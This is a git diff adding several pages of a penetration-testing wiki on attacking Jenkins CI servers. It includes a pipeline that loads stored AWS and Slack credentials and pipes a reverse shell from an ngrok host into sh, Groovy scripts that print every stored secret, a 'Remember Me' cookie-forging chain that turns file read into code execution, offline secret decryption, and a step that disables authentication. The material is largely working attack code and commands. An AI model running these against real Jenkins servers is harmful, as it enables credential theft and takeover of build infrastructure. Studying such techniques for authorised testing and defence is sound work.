+ +### **RCE Creating/Modifying a project** + +Creating/Modifying a project is a way to obtain RCE over the Jenkins server: + +{% content-ref url="jenkins-rce-creating-modifying-project.md" %} +[jenkins-rce-creating-modifying-project.md](jenkins-rce-creating-modifying-project.md) +{% endcontent-ref %} + +### **RCE Execute Groovy script** + +You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project: + +{% content-ref url="jenkins-rce-with-groovy-script.md" %} +[jenkins-rce-with-groovy-script.md](jenkins-rce-with-groovy-script.md) +{% endcontent-ref %} + +### RCE Creating/Modifying Pipeline + +You can also get **RCE by creating/modifying a pipeline**: + +{% content-ref url="jenkins-rce-creating-modifying-pipeline.md" %} +[jenkins-rce-creating-modifying-pipeline.md](jenkins-rce-creating-modifying-pipeline.md) +{% endcontent-ref %} + +## Pipeline Exploitation + +To exploit pipelines you still need to have access to Jenkins. + +### Build Pipelines + +**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used: + +![](<../../.gitbook/assets/image (127).png>) + +It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access. + +If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\ +It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not). 
+ +The most common triggers to execute a custom pipeline are: + +* **Pull request** to the main branch (or potentially to other branches) +* **Push to the main branch** (or potentially to other branches) +* **Update the main branch** and wait until it's executed somehow + +{% hint style="info" %} +If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**. +{% endhint %} + +### Pipeline RCE + +In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](./#rce-creating-modifying-pipeline). + +### Checking Env variables + +It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. This env variables **shouldn't contain sensitive info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles: + +```bash +pipeline { + agent {label 'built-in'} + environment { + GENERIC_ENV_VAR = "Test pipeline ENV variables." + } + + stages { + stage("Build") { + environment { + STAGE_ENV_VAR = "Test stage ENV variables." + } + steps { +``` + +### Dumping secrets + +For information about how are secrets usually treated by Jenkins check out the basic information: + +{% content-ref url="basic-jenkins-information.md" %} +[basic-jenkins-information.md](basic-jenkins-information.md) +{% endcontent-ref %} + +Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job//configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines. + +There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. 
For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**: + +``` +ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected +``` + +Here you have the way to load some common secret types: + +```bash +withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) { + sh ''' + env #Search for USERNAME and PASS + ''' +} + +withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) { + sh ''' + env #Search for SECRET + ''' +} + +withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) { + sh ''' + env # Search for USERPASS + ''' +} + +# You can also load multiple env variables at once +withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'), + string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { + sh ''' + env + ''' +} +``` + +At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/) + +{% hint style="warning" %} +The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\ +More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation). +{% endhint %} + +### Triggers + +From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. 
For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`. + +Cron example: + +```bash +triggers { cron('H */4 * * 1-5') } +``` + +Check **other examples in the docs**. + +### Nodes & Agents + +A **Jenkins instance** might have **different agents running in different machines**. From an attacker perspective, access to different machines means **different potential cloud credentials** to steal or **different network access** that could be abuse to exploit other machines. + +For more information check the basic information: + +{% content-ref url="basic-jenkins-information.md" %} +[basic-jenkins-information.md](basic-jenkins-information.md) +{% endcontent-ref %} + +You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more: + +![](<../../.gitbook/assets/image (249).png>) + +It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information. + +To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config: + +```bash +pipeline { + agent {label 'built-in'} +``` + +### Complete example + +Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell: + +```bash +pipeline { + agent {label 'built-in'} + triggers { cron('H */4 * * 1-5') } + environment { + GENERIC_ENV_VAR = "Test pipeline ENV variables." + } + + stages { + stage("Build") { + environment { + STAGE_ENV_VAR = "Test stage ENV variables." 
+ } + steps { + withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'), + string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { + sh ''' + curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS + ''' + } + } + } + + post { + always { + cleanWs() + } + } +} +``` + +## Arbitrary File Read to RCE + +{% content-ref url="jenkins-arbitrary-file-read-to-rce-via-remember-me.md" %} +[jenkins-arbitrary-file-read-to-rce-via-remember-me.md](jenkins-arbitrary-file-read-to-rce-via-remember-me.md) +{% endcontent-ref %} + +## RCE + +{% content-ref url="jenkins-rce-with-groovy-script.md" %} +[jenkins-rce-with-groovy-script.md](jenkins-rce-with-groovy-script.md) +{% endcontent-ref %} + +{% content-ref url="jenkins-rce-creating-modifying-project.md" %} +[jenkins-rce-creating-modifying-project.md](jenkins-rce-creating-modifying-project.md) +{% endcontent-ref %} + +{% content-ref url="jenkins-rce-creating-modifying-pipeline.md" %} +[jenkins-rce-creating-modifying-pipeline.md](jenkins-rce-creating-modifying-pipeline.md) +{% endcontent-ref %} + +## Post Exploitation + +### Metasploit + +``` +msf> post/multi/gather/jenkins_gather +``` + +### Jenkins Secrets + +You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**. + +If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**. 
+ +![](<../../.gitbook/assets/image (180).png>) + +#### From Groovy + +{% content-ref url="jenkins-dumping-secrets-from-groovy.md" %} +[jenkins-dumping-secrets-from-groovy.md](jenkins-dumping-secrets-from-groovy.md) +{% endcontent-ref %} + +#### From disk + +These files are needed to **decrypt Jenkins secrets**: + +* secrets/master.key +* secrets/hudson.util.Secret + +Such **secrets can usually be found in**: + +* credentials.xml +* jobs/.../build.xml +* jobs/.../config.xml + +Here's a regex to find them: + +```bash +# Find the secrets +grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" +# Print only the filenames where the secrets are located +grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" + +# Secret example +credentials.xml: {AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==} +``` + +#### Decrypt Jenkins secrets offline + +If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**. + +```bash +python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml +06165DF2-C047-4402-8CAB-1C8EC526C115 +-----BEGIN OPENSSH PRIVATE KEY----- +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn +NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT +``` + +#### Decrypt Jenkins secrets from Groovy + +```bash +println(hudson.util.Secret.decrypt("{...}")) +``` + +### Create new admin user + +1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\` +2. Search for the word `true`and change the word \*\*`true` \*\* to **`false`**. + 1. `sed -i -e 's/truefalsetrue` and **restart the Jenkins again**. 
+ +## References + +* [https://github.com/gquere/pwn\_jenkins](https://github.com/gquere/pwn_jenkins) +* [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/) +* [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password) +* [https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html](https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html) +* [https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072](https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072) +* [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md new file mode 100644 index 0000000000..43612a6e65 --- /dev/null +++ b/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md @@ -0,0 +1,120 @@ +# Basic Jenkins Information + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Access + +### Username + Password + +The most common way to login in Jenkins if with a username or a password + +### Cookie + +If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen). + +### SSO/Plugins + +Jenkins can be configured using plugins to be **accessible via third party SSO**. + +### Tokens + +**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API. + +### SSH Keys + +This component provides a built-in SSH server for Jenkins. It’s an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/)) + +## Authorization + +In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options: + +* **Anyone can do anything**: Even anonymous access can administrate the server +* **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access. +* **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**. +* **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**. 
+ +![](<../../.gitbook/assets/image (149).png>) + +* **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.** +* **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`. + +## **Security Realm** + +In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms: + +* **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/). +* **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default. +* **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups. +* **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization. + +Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as: + +* [Active Directory](https://plugins.jenkins.io/active-directory) +* [GitHub Authentication](https://plugins.jenkins.io/github-oauth) +* [Atlassian Crowd 2](https://plugins.jenkins.io/crowd2) + +## Jenkins Nodes, Agents & Executors + +Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/): + +**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold. 
+ +**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine. + +An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time. + +## Jenkins Secrets + +### Encryption of Secrets and Credentials + +Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. 
For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include: + +* `hudson.util.Secret`: used for generic secrets; +* `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types; +* `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and + +### Credentials Access + +Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job//configure`) and therefore only accessible from the specific project. + +According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials. 
+ +**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.** + +## References + +* [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/) +* [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/) +* [https://www.jenkins.io/doc/developer/security/secrets/](https://www.jenkins.io/doc/developer/security/secrets/) +* [https://www.jenkins.io/blog/2019/02/21/credentials-masking/](https://www.jenkins.io/blog/2019/02/21/credentials-masking/) +* [https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery) +* [https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials) +* [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md new file mode 100644 index 0000000000..06ae836213 --- /dev/null +++ b/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md @@ -0,0 +1,135 @@ +# Jenkins Arbitrary File Read to RCE via "Remember Me" + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) + +This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own: + +### Attack Prerequisites + +* **Feature Requirement:** "Remember me" must be enabled (default setting). +* **Access Levels:** Attacker needs Overall/Read permissions. +* **Secret Access:** Ability to read both binary and textual content from key files. + +### Detailed Exploitation Process + +#### Step 1: Data Collection + +**User Information Retrieval** + +* Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather: + * **Username** + * **User seed** + * **Timestamp** + * **Password hash** + +**Secret Key Extraction** + +* Extract cryptographic keys used for signing the cookie: + * **Secret Key:** `$JENKINS_HOME/secret.key` + * **Master Key:** `$JENKINS_HOME/secrets/master.key` + * **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` + +#### Step 2: Cookie Forging + +**Token Preparation** + +* **Calculate Token Expiry Time:** + + {% code overflow="wrap" %} + ```javascript + tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time + ``` + {% endcode %} +* **Concatenate Data for Token:** + + {% code overflow="wrap" %} + ```javascript + token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey + ``` + {% endcode %} + +**MAC Key Decryption** + +* **Decrypt MAC Key File:** + + ```javascript + key = toAes128Key(masterKey) // Convert master key to AES128 key format + decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file + if not 
decrypted.hasSuffix("::::MAGIC::::") + return ERROR; + macKey = decrypted.withoutSuffix("::::MAGIC::::") + ``` + +**Signature Computation** + +* **Compute HMAC SHA256:** + + ```javascript + mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key + tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string + ``` + +**Cookie Encoding** + +* **Generate Final Cookie:** + + {% code overflow="wrap" %} + ```javascript + cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature) // Base64 encode the cookie data + ``` + {% endcode %} + +#### Step 3: Code Execution + +**Session Authentication** + +* **Fetch CSRF and Session Tokens:** + * Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`. + * Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie. + +**Command Execution Request** + +* **Send a POST Request with Groovy Script:** + + ```bash + curl -X POST "$JENKINS_URL/scriptText" \ + --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ + --header "Jenkins-Crumb: $CRUMB" \ + --header "Content-Type: application/x-www-form-urlencoded" \ + --data-urlencode "script=$SCRIPT" + ``` + + * Groovy script can be used to execute system-level commands or other operations within the Jenkins environment. + +The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + diff --git a/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md new file mode 100644 index 0000000000..1d1b94715e --- /dev/null +++ b/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md @@ -0,0 +1,116 @@ +# Jenkins Dumping Secrets from Groovy + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +{% hint style="warning" %} +Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**. +{% endhint %} + +You can **dump all the secrets from the Groovy Script console** in `/script` running this code + +```java +// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/ +import jenkins.model.* +import com.cloudbees.plugins.credentials.* +import com.cloudbees.plugins.credentials.impl.* +import com.cloudbees.plugins.credentials.domains.* +import com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey +import org.jenkinsci.plugins.plaincredentials.StringCredentials +import org.jenkinsci.plugins.plaincredentials.impl.FileCredentialsImpl + +def showRow = { credentialType, secretId, username = null, password = null, description = null -> +println("${credentialType} : ".padLeft(20) + secretId?.padRight(38)+" | " +username?.padRight(20)+" | " +password?.padRight(40) + " | " +description) +} + +// set Credentials domain name (null means is it global) +domainName = null + +credentialsStore = Jenkins.instance.getExtensionList('com.cloudbees.plugins.credentials.SystemCredentialsProvider')[0]?.getStore() +domain = new Domain(domainName, null, Collections.emptyList()) + +credentialsStore?.getCredentials(domain).each{ +if(it instanceof UsernamePasswordCredentialsImpl) +showRow("user/password", it.id, it.username, it.password?.getPlainText(), it.description) +else if(it instanceof BasicSSHUserPrivateKey) +showRow("ssh priv key", it.id, it.passphrase?.getPlainText(), it.privateKeySource?.getPrivateKey()?.getPlainText(), it.description) +else if(it instanceof StringCredentials) +showRow("secret text", it.id, it.secret?.getPlainText(), '', it.description) +else if(it instanceof FileCredentialsImpl) +showRow("secret file", it.id, it.content?.text, '', it.description) +else +showRow("something else", it.id, '', '', '') +} + +return 
+``` + +#### or this one: + +```java +import java.nio.charset.StandardCharsets; +def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials( + com.cloudbees.plugins.credentials.Credentials.class +) + +for (c in creds) { + println(c.id) + if (c.properties.description) { + println(" description: " + c.description) + } + if (c.properties.username) { + println(" username: " + c.username) + } + if (c.properties.password) { + println(" password: " + c.password) + } + if (c.properties.passphrase) { + println(" passphrase: " + c.passphrase) + } + if (c.properties.secret) { + println(" secret: " + c.secret) + } + if (c.properties.secretBytes) { + println(" secretBytes: ") + println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8)) + println("") + } + if (c.properties.privateKeySource) { + println(" privateKey: " + c.getPrivateKey()) + } + if (c.properties.apiToken) { + println(" apiToken: " + c.apiToken) + } + if (c.properties.token) { + println(" token: " + c.token) + } + println("") +} +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md new file mode 100644 index 0000000000..34044c311a --- /dev/null +++ b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md @@ -0,0 +1,65 @@ +# Jenkins RCE Creating/Modifying Pipeline + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
